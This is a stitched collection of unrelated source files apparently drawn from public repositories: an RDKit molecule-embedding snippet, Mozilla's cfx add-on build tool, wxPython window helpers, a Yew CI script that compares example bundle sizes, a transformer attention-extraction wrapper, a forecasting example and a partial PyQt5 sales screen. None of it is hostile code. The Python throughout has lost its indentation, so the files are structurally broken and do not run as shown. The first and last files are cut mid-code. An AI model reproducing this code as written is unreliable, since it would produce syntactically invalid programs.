data["LUFHAW"] = "CC1=CC2=C(S1)C3=CC4=C(C=C3C=C2)C5=C(C=C4)C=C(S5)C"
#smi, cif = "s1c2ccc3scc4ccc(c1)c2c34", "HAHCOI.cif"
#smi, cif = "s1ccc2cc3sc4cc5ccsc5cc4c3cc12", "JAPWIH.cif"
#smi, cif = "s1c(c2ccccc2)c(c2ccccc2)c2c1c(c(s2)c1ccccc1)c1ccccc1", "WEXBOS.cif"
#smi, cif = "s1c(/C=N/[C@H](C)c2ccc(F)cc2)ccc1/C=N/[C@H](C)c1ccc(F)cc1","LAGNAL.cif"
#smi, cif = "s1cccc1c1c(F)c(OC)c(c2sccc2)c(F)c1OC", "YICMOP.cif"
#smi, cif = "s1c2c(c3c1SCCC3)cc1sc3SCCCc3c1c2", "MERQIM.cif"
#smi, cif = "CC1=CC2=C(S1)C3=CC4=C(C=C3C=C2)C5=C(C=C4)C=C(S5)C", "LUFHAW.cif"
for file in glob("*.cif"):
name = file[:-4]
if name in data.keys():
smi = data[name]
m = Chem.MolFromSmiles(smi)
m2 = Chem.AddHs(m)
AllChem.EmbedMolecule(m2)
cids = AllChem.EmbedMultipleConfs(m2, numConfs=1)
xyz = Chem.rdmolfiles.MolToXYZBlock(m2, 0)
mol = mg.Molecule.from_str(xyz, fmt="xyz")
mol.to(filename=name+".xyz")
|
generate/lib/run-firefox/cuddlefish/__init__.py | flamencist/browser-extensions | 102 | 12669793 | import sys
import os
import optparse
import webbrowser
from copy import copy
import simplejson as json
from cuddlefish import packaging
from cuddlefish.bunch import Bunch
from cuddlefish.version import get_version
MOZRUNNER_BIN_NOT_FOUND = 'Mozrunner could not locate your binary'
MOZRUNNER_BIN_NOT_FOUND_HELP = """
I can't find the application binary in any of its default locations
on your system. Please specify one using the -b/--binary option.
"""
UPDATE_RDF_FILENAME = "%s.update.rdf"
XPI_FILENAME = "%s.xpi"
usage = """
%prog [options] command [command-specific options]
Supported Commands:
docs - view web-based documentation
init - create a sample addon in an empty directory
test - run tests
run - run program
xpi - generate an xpi
Internal Commands:
sdocs - export static documentation
testcfx - test the cfx tool
testex - test all example code
testpkgs - test all installed packages
testall - test whole environment
Experimental and internal commands and options are not supported and may be
changed or removed in the future.
"""
global_options = [
(("-v", "--verbose",), dict(dest="verbose",
help="enable lots of output",
action="store_true",
default=False)),
]
parser_groups = (
("Supported Command-Specific Options", [
(("", "--update-url",), dict(dest="update_url",
help="update URL in install.rdf",
metavar=None,
default=None,
cmds=['xpi'])),
(("", "--update-link",), dict(dest="update_link",
help="generate update.rdf",
metavar=None,
default=None,
cmds=['xpi'])),
(("-p", "--profiledir",), dict(dest="profiledir",
help=("profile directory to pass to "
"app"),
metavar=None,
default=None,
cmds=['test', 'run', 'testex',
'testpkgs', 'testall'])),
(("-b", "--binary",), dict(dest="binary",
help="path to app binary",
metavar=None,
default=None,
cmds=['test', 'run', 'testex', 'testpkgs',
'testall'])),
(("", "--binary-args",), dict(dest="cmdargs",
help=("additional arguments passed to the "
"binary"),
metavar=None,
default=None,
cmds=['run', 'test'])),
(("", "--dependencies",), dict(dest="dep_tests",
help="include tests for all deps",
action="store_true",
default=False,
cmds=['test', 'testex', 'testpkgs',
'testall'])),
(("", "--times",), dict(dest="iterations",
type="int",
help="number of times to run tests",
default=1,
cmds=['test', 'testex', 'testpkgs',
'testall'])),
(("-f", "--filter",), dict(dest="filter",
help=("only run tests whose filenames "
"match FILTER, a regexp"),
metavar=None,
default=None,
cmds=['test', 'testex', 'testpkgs',
'testall'])),
(("-g", "--use-config",), dict(dest="config",
help="use named config from local.json",
metavar=None,
default="default",
cmds=['test', 'run', 'xpi', 'testex',
'testpkgs', 'testall'])),
(("", "--templatedir",), dict(dest="templatedir",
help="XULRunner app/ext. template",
metavar=None,
default=None,
cmds=['run', 'xpi'])),
(("", "--package-path",), dict(dest="packagepath", action="append",
help="extra directories for package search",
metavar=None,
default=[],
cmds=['run', 'xpi', 'test'])),
(("", "--extra-packages",), dict(dest="extra_packages",
help=("extra packages to include, "
"comma-separated. Default is "
"'addon-kit'."),
metavar=None,
default="addon-kit",
cmds=['run', 'xpi', 'test', 'testex',
'testpkgs', 'testall',
'testcfx'])),
(("", "--pkgdir",), dict(dest="pkgdir",
help=("package dir containing "
"package.json; default is "
"current directory"),
metavar=None,
default=None,
cmds=['run', 'xpi', 'test'])),
(("", "--static-args",), dict(dest="static_args",
help="extra harness options as JSON",
type="json",
metavar=None,
default="{}",
cmds=['run', 'xpi'])),
]
),
("Experimental Command-Specific Options", [
(("-a", "--app",), dict(dest="app",
help=("app to run: firefox (default), "
"xulrunner, fennec, or thunderbird"),
metavar=None,
default="firefox",
cmds=['test', 'run', 'testex', 'testpkgs',
'testall'])),
(("", "--no-run",), dict(dest="no_run",
help=("Instead of launching the "
"application, just show the command "
"for doing so. Use this to launch "
"the application in a debugger like "
"gdb."),
action="store_true",
default=False,
cmds=['run', 'test'])),
(("", "--strip-xpi",), dict(dest="strip_xpi",
help="(ignored, deprecated, will be removed)",
action="store_true",
default=False,
cmds=['xpi'])),
(("", "--no-strip-xpi",), dict(dest="no_strip_xpi",
help="retain unused modules in XPI",
action="store_true",
default=False,
cmds=['xpi'])),
]
),
("Internal Command-Specific Options", [
(("", "--addons",), dict(dest="addons",
help=("paths of addons to install, "
"comma-separated"),
metavar=None,
default=None,
cmds=['test', 'run', 'testex', 'testpkgs',
'testall'])),
(("", "--baseurl",), dict(dest="baseurl",
help=("root of static docs tree: "
"for example: 'http://me.com/the_docs/'"),
metavar=None,
default='',
cmds=['sdocs'])),
(("", "--test-runner-pkg",), dict(dest="test_runner_pkg",
help=("name of package "
"containing test runner "
"program (default is "
"test-harness)"),
default="test-harness",
cmds=['test', 'testex', 'testpkgs',
'testall'])),
# --keydir was removed in 1.0b5, but we keep it around in the options
# parser to make life easier for frontends like FlightDeck which
# might still pass it. It can go away once the frontends are updated.
(("", "--keydir",), dict(dest="keydir",
help=("obsolete, ignored"),
metavar=None,
default=None,
cmds=['test', 'run', 'xpi', 'testex',
'testpkgs', 'testall'])),
(("", "--e10s",), dict(dest="enable_e10s",
help="enable out-of-process Jetpacks",
action="store_true",
default=False,
cmds=['test', 'run', 'testex', 'testpkgs'])),
(("", "--logfile",), dict(dest="logfile",
help="log console output to file",
metavar=None,
default=None,
cmds=['run', 'test', 'testex', 'testpkgs'])),
# TODO: This should default to true once our memory debugging
# issues are resolved; see bug 592774.
(("", "--profile-memory",), dict(dest="profileMemory",
help=("profile memory usage "
"(default is false)"),
type="int",
action="store",
default=0,
cmds=['test', 'testex', 'testpkgs',
'testall'])),
]
),
)
# Maximum time we'll wait for tests to finish, in seconds.
TEST_RUN_TIMEOUT = 10 * 60
def find_parent_package(cur_dir):
tail = True
while tail:
if os.path.exists(os.path.join(cur_dir, 'package.json')):
return cur_dir
cur_dir, tail = os.path.split(cur_dir)
return None
def check_json(option, opt, value):
# We return the parsed JSON here; see bug 610816 for background on why.
try:
return json.loads(value)
except ValueError:
raise optparse.OptionValueError("Option %s must be JSON." % opt)
class CfxOption(optparse.Option):
TYPES = optparse.Option.TYPES + ('json',)
TYPE_CHECKER = copy(optparse.Option.TYPE_CHECKER)
TYPE_CHECKER['json'] = check_json
def parse_args(arguments, global_options, usage, parser_groups, defaults=None):
parser = optparse.OptionParser(usage=usage.strip(), option_class=CfxOption)
def name_cmp(a, b):
# a[0] = name sequence
# a[0][0] = short name (possibly empty string)
# a[0][1] = long name
names = []
for seq in (a, b):
names.append(seq[0][0][1:] if seq[0][0] else seq[0][1][2:])
return cmp(*names)
global_options.sort(name_cmp)
for names, opts in global_options:
parser.add_option(*names, **opts)
for group_name, options in parser_groups:
group = optparse.OptionGroup(parser, group_name)
options.sort(name_cmp)
for names, opts in options:
if 'cmds' in opts:
cmds = opts['cmds']
del opts['cmds']
cmds.sort()
if not 'help' in opts:
opts['help'] = ""
opts['help'] += " (%s)" % ", ".join(cmds)
group.add_option(*names, **opts)
parser.add_option_group(group)
if defaults:
parser.set_defaults(**defaults)
(options, args) = parser.parse_args(args=arguments)
if not args:
parser.print_help()
parser.exit()
return (options, args)
# all tests emit progress messages to stderr, not stdout. (the mozrunner
# console output goes to stderr and is hard to change, and
# unittest.TextTestRunner prefers stderr, so we send everything else there
# too, to keep all the messages in order)
def test_all(env_root, defaults):
fail = False
print >>sys.stderr, "Testing cfx..."
sys.stderr.flush()
result = test_cfx(env_root, defaults['verbose'])
if result.failures or result.errors:
fail = True
print >>sys.stderr, "Testing all examples..."
sys.stderr.flush()
try:
test_all_examples(env_root, defaults)
except SystemExit, e:
fail = (e.code != 0) or fail
print >>sys.stderr, "Testing all packages..."
sys.stderr.flush()
try:
test_all_packages(env_root, defaults)
except SystemExit, e:
fail = (e.code != 0) or fail
if fail:
print >>sys.stderr, "Some tests were unsuccessful."
sys.exit(1)
print >>sys.stderr, "All tests were successful. Ship it!"
sys.exit(0)
def test_cfx(env_root, verbose):
import cuddlefish.tests
# tests write to stderr. flush everything before and after to avoid
# confusion later.
sys.stdout.flush(); sys.stderr.flush()
olddir = os.getcwd()
os.chdir(env_root)
retval = cuddlefish.tests.run(verbose)
os.chdir(olddir)
sys.stdout.flush(); sys.stderr.flush()
return retval
def test_all_examples(env_root, defaults):
examples_dir = os.path.join(env_root, "examples")
examples = [dirname for dirname in os.listdir(examples_dir)
if os.path.isdir(os.path.join(examples_dir, dirname))]
examples.sort()
fail = False
for dirname in examples:
print >>sys.stderr, "Testing %s..." % dirname
sys.stderr.flush()
try:
run(arguments=["test",
"--pkgdir",
os.path.join(examples_dir, dirname)],
defaults=defaults,
env_root=env_root)
except SystemExit, e:
fail = (e.code != 0) or fail
if fail:
sys.exit(-1)
def test_all_packages(env_root, defaults):
deps = []
target_cfg = Bunch(name = "testpkgs", dependencies = deps, version="fake")
pkg_cfg = packaging.build_config(env_root, target_cfg)
for name in pkg_cfg.packages:
if name != "testpkgs":
deps.append(name)
print >>sys.stderr, "Testing all available packages: %s." % (", ".join(deps))
sys.stderr.flush()
run(arguments=["test", "--dependencies"],
target_cfg=target_cfg,
pkg_cfg=pkg_cfg,
defaults=defaults)
def get_config_args(name, env_root):
local_json = os.path.join(env_root, "local.json")
if not (os.path.exists(local_json) and
os.path.isfile(local_json)):
if name == "default":
return []
else:
print >>sys.stderr, "File does not exist: %s" % local_json
sys.exit(1)
local_json = packaging.load_json_file(local_json)
if 'configs' not in local_json:
print >>sys.stderr, "'configs' key not found in local.json."
sys.exit(1)
if name not in local_json.configs:
if name == "default":
return []
else:
print >>sys.stderr, "No config found for '%s'." % name
sys.exit(1)
config = local_json.configs[name]
if type(config) != list:
print >>sys.stderr, "Config for '%s' must be a list of strings." % name
sys.exit(1)
return config
def initializer(env_root, args, out=sys.stdout, err=sys.stderr):
from templates import MAIN_JS, PACKAGE_JSON, README_DOC, MAIN_JS_DOC, TEST_MAIN_JS
path = os.getcwd()
addon = os.path.basename(path)
# if more than one argument
if len(args) > 1:
print >>err, 'Too many arguments.'
return 1
# avoid clobbering existing files, but we tolerate things like .git
existing = [fn for fn in os.listdir(path) if not fn.startswith(".")]
if existing:
print >>err, 'This command must be run in an empty directory.'
return 1
for d in ['lib','data','test','doc']:
os.mkdir(os.path.join(path,d))
print >>out, '*', d, 'directory created'
open('README.md','w').write(README_DOC % {'name':addon})
print >>out, '* README.md written'
open('package.json','w').write(PACKAGE_JSON % {'name':addon.lower(),
'fullName':addon })
print >>out, '* package.json written'
open(os.path.join(path,'test','test-main.js'),'w').write(TEST_MAIN_JS)
print >>out, '* test/test-main.js written'
open(os.path.join(path,'lib','main.js'),'w').write(MAIN_JS)
print >>out, '* lib/main.js written'
open(os.path.join(path,'doc','main.md'),'w').write(MAIN_JS_DOC)
print >>out, '* doc/main.md written'
print >>out, '\nYour sample add-on is now ready.'
print >>out, 'Do "cfx test" to test it and "cfx run" to try it. Have fun!'
return 0
def run(arguments=sys.argv[1:], target_cfg=None, pkg_cfg=None,
defaults=None, env_root=os.environ.get('CUDDLEFISH_ROOT'),
stdout=sys.stdout):
parser_kwargs = dict(arguments=arguments,
global_options=global_options,
parser_groups=parser_groups,
usage=usage,
defaults=defaults)
(options, args) = parse_args(**parser_kwargs)
config_args = get_config_args(options.config, env_root);
# reparse configs with arguments from local.json
if config_args:
parser_kwargs['arguments'] += config_args
(options, args) = parse_args(**parser_kwargs)
command = args[0]
if command == "init":
initializer(env_root, args)
return
if command == "testpkgs":
test_all_packages(env_root, defaults=options.__dict__)
return
elif command == "testex":
test_all_examples(env_root, defaults=options.__dict__)
return
elif command == "testall":
test_all(env_root, defaults=options.__dict__)
return
elif command == "testcfx":
test_cfx(env_root, options.verbose)
return
elif command == "docs":
from cuddlefish.docs import generate
if len(args) > 1:
docs_home = generate.generate_docs(env_root, filename=args[1])
else:
docs_home = generate.generate_docs(env_root)
webbrowser.open(docs_home)
return
elif command == "sdocs":
from cuddlefish.docs import generate
# TODO: Allow user to change this filename via cmd line.
filename = generate.generate_static_docs(env_root, base_url=options.baseurl)
print >>stdout, "Wrote %s." % filename
return
target_cfg_json = None
if not target_cfg:
if not options.pkgdir:
options.pkgdir = find_parent_package(os.getcwd())
if not options.pkgdir:
print >>sys.stderr, ("cannot find 'package.json' in the"
" current directory or any parent.")
sys.exit(1)
else:
options.pkgdir = os.path.abspath(options.pkgdir)
if not os.path.exists(os.path.join(options.pkgdir, 'package.json')):
print >>sys.stderr, ("cannot find 'package.json' in"
" %s." % options.pkgdir)
sys.exit(1)
target_cfg_json = os.path.join(options.pkgdir, 'package.json')
target_cfg = packaging.get_config_in_dir(options.pkgdir)
# At this point, we're either building an XPI or running Jetpack code in
# a Mozilla application (which includes running tests).
use_main = False
timeout = None
inherited_options = ['verbose', 'enable_e10s']
if command == "xpi":
use_main = True
elif command == "test":
if 'tests' not in target_cfg:
target_cfg['tests'] = []
timeout = TEST_RUN_TIMEOUT
inherited_options.extend(['iterations', 'filter', 'profileMemory'])
elif command == "run":
use_main = True
else:
print >>sys.stderr, "Unknown command: %s" % command
print >>sys.stderr, "Try using '--help' for assistance."
sys.exit(1)
if use_main and 'main' not in target_cfg:
# If the user supplies a template dir, then the main
# program may be contained in the template.
if not options.templatedir:
print >>sys.stderr, "package.json does not have a 'main' entry."
sys.exit(1)
if not pkg_cfg:
pkg_cfg = packaging.build_config(env_root, target_cfg, options.packagepath)
target = target_cfg.name
# the harness_guid is used for an XPCOM class ID. We use the
# JetpackID for the add-on ID and the XPCOM contract ID.
if "harnessClassID" in target_cfg:
# For the sake of non-bootstrapped extensions, we allow to specify the
# classID of harness' XPCOM component in package.json. This makes it
# possible to register the component using a static chrome.manifest file
harness_guid = target_cfg["harnessClassID"]
else:
import uuid
harness_guid = str(uuid.uuid4())
# TODO: Consider keeping a cache of dynamic UUIDs, based
# on absolute filesystem pathname, in the root directory
# or something.
if command in ('xpi', 'run'):
from cuddlefish.preflight import preflight_config
if target_cfg_json:
config_was_ok, modified = preflight_config(target_cfg,
target_cfg_json)
if not config_was_ok:
if modified:
# we need to re-read package.json . The safest approach
# is to re-run the "cfx xpi"/"cfx run" command.
print >>sys.stderr, ("package.json modified: please re-run"
" 'cfx %s'" % command)
else:
print >>sys.stderr, ("package.json needs modification:"
" please update it and then re-run"
" 'cfx %s'" % command)
sys.exit(1)
# if we make it this far, we have a JID
else:
assert command == "test"
if "id" in target_cfg:
jid = target_cfg["id"]
if not ("@" in jid or jid.startswith("{")):
jid = jid + "@jetpack"
unique_prefix = '%s-' % jid # used for resource: URLs
else:
# The Jetpack ID is not required for cfx test, in which case we have to
# make one up based on the GUID.
unique_prefix = '%s-' % target
jid = harness_guid
bundle_id = jid
# the resource: URL's prefix is treated too much like a DNS hostname
unique_prefix = unique_prefix.lower()
unique_prefix = unique_prefix.replace("@", "-at-")
unique_prefix = unique_prefix.replace(".", "-dot-")
targets = [target]
if command == "test":
targets.append(options.test_runner_pkg)
extra_packages = []
if options.extra_packages:
extra_packages = options.extra_packages.split(",")
if extra_packages:
targets.extend(extra_packages)
target_cfg.extra_dependencies = extra_packages
deps = packaging.get_deps_for_targets(pkg_cfg, targets)
from cuddlefish.manifest import build_manifest, ModuleNotFoundError
uri_prefix = "resource://%s" % unique_prefix
# Figure out what loader files should be scanned. This is normally
# computed inside packaging.generate_build_for_target(), by the first
# dependent package that defines a "loader" property in its package.json.
# This property is interpreted as a filename relative to the top of that
# file, and stored as a URI in build.loader . generate_build_for_target()
# cannot be called yet (it needs the list of used_deps that
# build_manifest() computes, but build_manifest() needs the list of
# loader files that it computes). We could duplicate or factor out this
# build.loader logic, but that would be messy, so instead we hard-code
# the choice of loader for manifest-generation purposes. In practice,
# this means that alternative loaders probably won't work with
# --strip-xpi.
assert packaging.DEFAULT_LOADER == "api-utils"
assert pkg_cfg.packages["api-utils"].loader == "lib/cuddlefish.js"
cuddlefish_js_path = os.path.join(pkg_cfg.packages["api-utils"].root_dir,
"lib", "cuddlefish.js")
loader_modules = [("api-utils", "lib", "cuddlefish", cuddlefish_js_path)]
try:
manifest = build_manifest(target_cfg, pkg_cfg, deps, uri_prefix, False,
loader_modules)
except ModuleNotFoundError, e:
print str(e)
sys.exit(1)
used_deps = manifest.get_used_packages()
if command == "test":
# The test runner doesn't appear to link against any actual packages,
# because it loads everything at runtime (invisible to the linker).
# If we believe that, we won't set up URI mappings for anything, and
# tests won't be able to run.
used_deps = deps
for xp in extra_packages:
if xp not in used_deps:
used_deps.append(xp)
build = packaging.generate_build_for_target(
pkg_cfg, target, used_deps,
prefix=unique_prefix, # used to create resource: URLs
include_dep_tests=options.dep_tests
)
if 'resources' in build:
resources = build.resources
for name in resources:
resources[name] = os.path.abspath(resources[name])
harness_contract_id = ('@mozilla.org/harness-service;1?id=%s' % jid)
harness_options = {
'bootstrap': {
'contractID': harness_contract_id,
'classID': '{%s}' % harness_guid
},
'jetpackID': jid,
'bundleID': bundle_id,
'uriPrefix': uri_prefix,
'staticArgs': options.static_args,
'name': target,
}
harness_options.update(build)
if command == "test":
# This should be contained in the test runner package.
harness_options['main'] = 'run-tests'
else:
harness_options['main'] = target_cfg.get('main')
for option in inherited_options:
harness_options[option] = getattr(options, option)
harness_options['metadata'] = packaging.get_metadata(pkg_cfg, used_deps)
sdk_version = get_version(env_root)
harness_options['sdkVersion'] = sdk_version
packaging.call_plugins(pkg_cfg, used_deps)
retval = 0
if options.templatedir:
app_extension_dir = os.path.abspath(options.templatedir)
else:
mydir = os.path.dirname(os.path.abspath(__file__))
if sys.platform == "darwin":
# If we're on OS X, at least point into the XULRunner
# app dir so we run as a proper app if using XULRunner.
app_extension_dir = os.path.join(mydir, "Test App.app",
"Contents", "Resources")
else:
app_extension_dir = os.path.join(mydir, "app-extension")
harness_options['manifest'] = manifest.get_harness_options_manifest(uri_prefix)
if command == 'xpi':
from cuddlefish.xpi import build_xpi
from cuddlefish.rdf import gen_manifest, RDFUpdate
manifest_rdf = gen_manifest(template_root_dir=app_extension_dir,
target_cfg=target_cfg,
bundle_id=bundle_id,
update_url=options.update_url,
bootstrap=True)
if options.update_link:
rdf_name = UPDATE_RDF_FILENAME % target_cfg.name
print >>stdout, "Exporting update description to %s." % rdf_name
update = RDFUpdate()
update.add(manifest_rdf, options.update_link)
open(rdf_name, "w").write(str(update))
# ask the manifest what files were used, so we can construct an XPI
# without the rest. This will include the loader (and everything it
# uses) because of the "loader_modules" starting points we passed to
# build_manifest earlier
used_files = set(manifest.get_used_files())
if options.strip_xpi:
print >>stdout, "--strip-xpi is now the default: argument ignored"
if options.no_strip_xpi:
used_files = None # disables the filter, includes all files
xpi_name = XPI_FILENAME % target_cfg.name
print >>stdout, "Exporting extension to %s." % xpi_name
build_xpi(template_root_dir=app_extension_dir,
manifest=manifest_rdf,
xpi_name=xpi_name,
harness_options=harness_options,
limit_to=used_files)
else:
from cuddlefish.runner import run_app
if options.profiledir:
options.profiledir = os.path.expanduser(options.profiledir)
options.profiledir = os.path.abspath(options.profiledir)
if options.addons is not None:
options.addons = options.addons.split(",")
try:
retval = run_app(harness_root_dir=app_extension_dir,
harness_options=harness_options,
app_type=options.app,
binary=options.binary,
profiledir=options.profiledir,
verbose=options.verbose,
timeout=timeout,
logfile=options.logfile,
addons=options.addons,
args=options.cmdargs,
norun=options.no_run)
except Exception, e:
if str(e).startswith(MOZRUNNER_BIN_NOT_FOUND):
print >>sys.stderr, MOZRUNNER_BIN_NOT_FOUND_HELP.strip()
retval = -1
else:
raise
sys.exit(retval)
|
python_toolbox/wx_tools/window_tools.py | hboshnak/python_toolbox | 119 | 12669798 | # Copyright 2009-2017 <NAME>.
# This program is distributed under the MIT license.
'''Defines various tools for manipulating windows.'''
import wx
from python_toolbox.freezing import Freezer
# CuteTimer (used by FlagRaiser below) lives in a `cute_timer` module; the exact
# import path is assumed here.
from python_toolbox.wx_tools import cute_timer
class WindowFreezer(Freezer):
'''Context manager for freezing the window while the suite executes.'''
def __init__(self, window):
Freezer.__init__(self)
assert isinstance(window, wx.Window)
self.window = window
def freeze_handler(self):
self.window.Freeze()
def thaw_handler(self):
self.window.Thaw()
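# Illustrative usage sketch: freeze a window while repopulating it so the user
# never sees intermediate repaints. (`rebuild_contents` is a hypothetical helper.)
#
#     with WindowFreezer(my_frame):
#         rebuild_contents(my_frame)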
class FlagRaiser: # todo: rename?
'''When called, raises a flag of a window and then calls some function.'''
def __init__(self, window, attribute_name=None, function=None, delay=None):
'''
Construct the flag raiser.
`window` is the window we're acting on. `attribute_name` is the name of
the flag that we set to True. `function` is the function we call after
we set the flag. Default for `function` is `window.Refresh`.
If we get a `delay` argument, then we don't call the function
immediately, but wait for `delay` time, specified as seconds, then call
it. If this flag raiser will be called again while the timer's on, it
will not cause another function calling.
'''
assert isinstance(window, wx.Window)
self.window = window
'''The window that the flag raiser is acting on.'''
self.attribute_name = attribute_name
'''The name of the flag that this flag raiser raises.'''
self.function = function or window.Refresh
'''The function that this flag raiser calls after raising the flag.'''
self.delay = delay
'''The delay, in seconds, that we wait before calling the function.'''
if delay is not None:
self._delay_in_ms = delay * 1000
'''The delay in milliseconds.'''
self.timer = cute_timer.CuteTimer(self.window)
'''The timer we use to call the function.'''
self.window.Bind(wx.EVT_TIMER, self._on_timer, self.timer)
def __call__(self):
'''Raise the flag and call the function. (With delay if we set one.)'''
if self.attribute_name:
setattr(self.window, self.attribute_name, True)
if self.delay is None:
self.function()
else: # self.delay is a positive number
if not self.timer.IsRunning():
self.timer.Start(self._delay_in_ms, oneShot=True)
def _on_timer(self, event):
if getattr(self.window, self.attribute_name) is True:
            self.function()
|
ci/make_example_size_cmt.py | lostinspiration/yew | 8,292 | 12669807 | <gh_stars>1000+
from typing import Dict, List, Optional, Tuple
import os
import json
header = "| examples | master (KB) | pull request (KB) | diff (KB) | diff (%) |"
sep = "| --- | --- | --- | --- | --- |"
def format_size(size: Optional[int]) -> str:
if size is None:
return "N/A"
if size == 0:
return "0"
return f"{size / 1024:.3f}"
def format_diff_size(
master_size: Optional[int], pr_size: Optional[int]
) -> Tuple[str, str, bool]:
if master_size is None or pr_size is None:
return ("N/A", "N/A", False)
diff = pr_size - master_size
if diff == 0:
return ("0", "0.000%", False)
diff_percent = diff / master_size
return (f"{diff / 1024:+.3f}", f"{diff_percent:+.3%}", abs(diff_percent) >= 0.01)
def main() -> None:
with open("size-cmp-info/.SIZE_CMP_INFO") as f:
content = json.loads(f.read())
joined_sizes = content["sizes"]
issue_number = content["issue_number"]
lines: List[str] = []
significant_lines: List[str] = []
lines.append("### Size Comparison")
lines.append("")
lines.append("<details>")
lines.append("")
lines.append(header)
lines.append(sep)
for (i, sizes) in joined_sizes:
(master_size, pr_size) = sizes
master_size_str = format_size(master_size)
pr_size_str = format_size(pr_size)
(diff_str, diff_percent, diff_significant) = format_diff_size(
master_size, pr_size
)
line_str = (
f"| {i} | {master_size_str} | {pr_size_str} | "
f"{diff_str} | {diff_percent} |"
)
lines.append(line_str)
if diff_significant:
significant_lines.append(line_str)
lines.append("")
lines.append("</details>")
lines.append("")
if significant_lines:
if len(significant_lines) == 1:
lines.append("⚠️ The following example has changed its size significantly:")
else:
lines.append(
"⚠️ The following examples have changed their size significantly:"
)
lines.append("")
lines.append(header)
lines.append(sep)
lines.extend(significant_lines)
else:
lines.append("✅ None of the examples has changed their size significantly.")
output = "\n".join(lines)
with open(os.environ["GITHUB_ENV"], "a+") as f:
f.write(f"YEW_EXAMPLE_SIZES={json.dumps(output)}\n")
f.write(f"PR_NUMBER={issue_number}\n")
if __name__ == "__main__":
main()
|
api.py | SIDN-IAP/attention-visualization | 134 | 12669819 | <gh_stars>100-1000
import torch
from transformers import (
AutoTokenizer,
AutoModel,
)
class AttentionGetter:
'''
    Wrapper class that holds a model and its tokenizer.
'''
def __init__(self, model_name: str):
'''
Each model has an associated tokenizer object.
Load both.
'''
super().__init__()
self.device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
self.model = AutoModel.from_pretrained(model_name, output_attentions=True).to(
self.device
)
self.tokenizer = AutoTokenizer.from_pretrained(model_name)
def _grab_attn(self, context):
'''
function to get the attention for a model.
First runs a forward pass and then extracts and formats attn.
'''
output = self.model(context)
# Grab the attention from the output
# Format as Layer x Head x From x To
attn = torch.cat([l for l in output[-1]], dim=0)
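        # Each weight becomes a whole-number percentage string
        # (e.g. a weight of 0.073 is rendered as "7").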
        format_attn = [
            [
                [[str(round(att * 100)) for att in from_row] for from_row in head]
                for head in layer
            ]
            for layer in attn.cpu().tolist()
        ]
return format_attn
def gpt_analyze_text(self, text: str):
"""
Works for GPT-2 Style Models
"""
# Run tokenizer
toked = self.tokenizer.encode(text)
        # GPT-2 conditions generation on a leading <|endoftext|> token. Add it:
start_token = torch.full(
(1, 1), self.tokenizer.bos_token_id, device=self.device, dtype=torch.long,
)
# Concatenate the text and start token
context = torch.tensor(toked, device=self.device, dtype=torch.long).unsqueeze(0)
context = torch.cat([start_token, context], dim=1)
# Extract attention
attn = self._grab_attn(context)
# Build payload
return {
"tokens": self.tokenizer.convert_ids_to_tokens(context[0]),
"attention": attn,
}
def bert_analyze_text(self, text: str):
"""
Works for BERT Style models
"""
# Tokenize
toked = self.tokenizer.encode(text)
# Build Tensor
        context = torch.tensor(toked, device=self.device, dtype=torch.long).unsqueeze(0)
# Extract Attention
attn = self._grab_attn(context)
# Build Payload
return {
"tokens": self.tokenizer.convert_ids_to_tokens(toked),
"attention": attn,
}
if __name__ == "__main__":
model = AttentionGetter("gpt2")
payload = model.gpt_analyze_text("This is a test.")
print(payload)
model = AttentionGetter("distilbert-base-uncased")
payload = model.bert_analyze_text("This is a test.")
print(payload)
print("checking successful!")
|
examples/basic_usage/run_skater_and_return _forecast_error.py | iklasky/timemachines | 253 | 12669820 | from timemachines.skaters.simple.thinking import thinking_slow_and_slow
from timemachines.skatertools.evaluation.evaluators import hospital_mean_square_error_with_sporadic_fit
if __name__=='__main__':
print(hospital_mean_square_error_with_sporadic_fit(f=thinking_slow_and_slow,n=120,fit_frequency=10)) |
controle_estoque/Views/mainVendas.py | jucimar1/controleEstoque | 134 | 12669839 | <gh_stars>100-1000
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'mainVendas.ui',
# licensing of 'mainVendas.ui' applies.
#
# Created: Mon Mar 18 10:46:46 2019
# by: PyQt5-uic running on PyQt5 5.12.1
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_ct_MainVendas(object):
def setMainVendas(self, ct_MainVendas):
ct_MainVendas.setObjectName("ct_MainVendas")
ct_MainVendas.resize(1000, 600)
ct_MainVendas.setStyleSheet("border:none")
self.frameMainVendas = QtWidgets.QFrame(ct_MainVendas)
self.frameMainVendas.setGeometry(QtCore.QRect(0, 0, 1000, 600))
self.frameMainVendas.setObjectName("frameMainVendas")
self.fr_TopoMenuVendas = QtWidgets.QFrame(self.frameMainVendas)
self.fr_TopoMenuVendas.setGeometry(QtCore.QRect(0, 60, 1000, 40))
self.fr_TopoMenuVendas.setStyleSheet("background:#E1DFE0;\n"
"border: none;")
self.fr_TopoMenuVendas.setObjectName("fr_TopoMenuVendas")
self.bt_BuscaVendas = QtWidgets.QPushButton(self.fr_TopoMenuVendas)
self.bt_BuscaVendas.setGeometry(QtCore.QRect(820, 5, 30, 30))
font = QtGui.QFont()
font.setFamily("Arial")
self.bt_BuscaVendas.setFont(font)
self.bt_BuscaVendas.setCursor(QtCore.Qt.PointingHandCursor)
self.bt_BuscaVendas.setFocusPolicy(QtCore.Qt.NoFocus)
self.bt_BuscaVendas.setContextMenuPolicy(QtCore.Qt.NoContextMenu)
self.bt_BuscaVendas.setStyleSheet("")
self.bt_BuscaVendas.setText("")
self.bt_BuscaVendas.setObjectName("bt_BuscaVendas")
self.bt_AddNovoVenda = QtWidgets.QPushButton(self.fr_TopoMenuVendas)
self.bt_AddNovoVenda.setGeometry(QtCore.QRect(900, 0, 100, 40))
self.bt_AddNovoVenda.setCursor(QtCore.Qt.PointingHandCursor)
self.bt_AddNovoVenda.setFocusPolicy(QtCore.Qt.NoFocus)
self.bt_AddNovoVenda.setContextMenuPolicy(QtCore.Qt.ActionsContextMenu)
self.bt_AddNovoVenda.setStyleSheet("QPushButton {\n"
"background-color: #7AB32E;\n"
" }\n"
"QPushButton:hover{\n"
"background-color: #40a286\n"
"}")
self.bt_AddNovoVenda.setText("")
self.bt_AddNovoVenda.setObjectName("bt_AddNovoVenda")
self.tx_BuscaVendas = QtWidgets.QLineEdit(self.fr_TopoMenuVendas)
self.tx_BuscaVendas.setGeometry(QtCore.QRect(0, 5, 300, 30))
font = QtGui.QFont()
font.setFamily("Arial")
self.tx_BuscaVendas.setFont(font)
